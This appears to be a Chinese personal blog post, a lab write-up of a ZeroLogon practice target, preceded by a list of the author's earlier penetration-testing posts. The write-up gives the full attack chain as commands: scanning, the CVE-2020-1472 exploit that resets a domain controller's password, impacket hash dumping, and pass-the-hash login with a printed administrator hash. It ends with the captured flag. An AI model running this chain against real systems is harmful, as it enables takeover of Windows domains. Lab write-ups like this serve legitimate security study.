无境ZeroLogon 练习 wp
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记
文章目录
- 前文链接
- writeup
前文链接
- WAMP/DVWA/sqli-labs 搭建
- burpsuite工具抓包及Intruder暴力破解的使用
- 目录扫描,请求重发,漏洞扫描等工具的使用
- 网站信息收集及nmap的下载使用
- SQL注入(1)——了解成因和手工注入方法
- SQL注入(2)——各种注入
- SQL注入(3)——SQLMAP
- SQL注入(4)——实战SQL注入拿webshell
- Vulnhub靶机渗透之Me and My Girlfriend
- XSS漏洞
- 文件上传漏洞
- 文件上传绕过
- 文件包含漏洞
- Vulnhub靶机渗透之zico2
- 命令执行漏洞
- 逻辑漏洞(越权访问和支付漏洞)
- 网站后台安全
- weevely的使用及免杀(Linux中的菜刀)
- MSF(1)——一次完整的渗透流程
- WebShell命令执行限制(解决方案)
- 记一次艰难的SQL注入(过安全狗)
- MSF(2)——各种木马的生成及简单的免杀
- MSF(3)——apk和exe的加马(过360、火绒)
- 通过Frp解决实现内网穿透
- 改造冰蝎马,实现免杀之default_aes php
- 记一次简单的对盗号网站的渗透
- 记一次幸运的漏洞挖掘
- 记一次从外网打通AWS云
- 内网渗透初探
- 记对外国某服务器的内网渗透
- 一次丝滑的内网渗透拿下域控
- 实战内网PTH上线域控
- 通过路由器进行内网渗透
- 钓鱼邮件和钓鱼样本
- 无境vulntarget-a wp
writeup
目标地址是192.168.111.100,挂好vpn用fscan快速扫描
fscanPlus_amd64-h192.168.111.100-np
域控机,用zerologon直接打
impacket:https://github.com/maaaaz/impacket-examples-windows
CVE-2020-1472:https://github.com/dirkjanm/CVE-2020-1472
python cve-2020-1472-exploit.py masterpc192.168.111.100等进度条跑完,域控机密码就重置了
然后用impacket工具包里的secretsdump导出hash
secretsdump.exe myd.com/masterpc$@192.168.111.100 -no-pass -just-dc
拿到管理员hash:ec0df45863a3751d56ba6df1e72f7218
使用工具包里的wmiexec连上去即可
wmiexec.exe myd.com/Administrator@192.168.111.100-hashesaad3b435b51404eeaad3b435b51404ee:ec0df45863a3751d56ba6df1e72f7218
flag就在根目录下
moreflag.txt
得到flag为:48255d2fc759b14f4127fda7c5a86d89
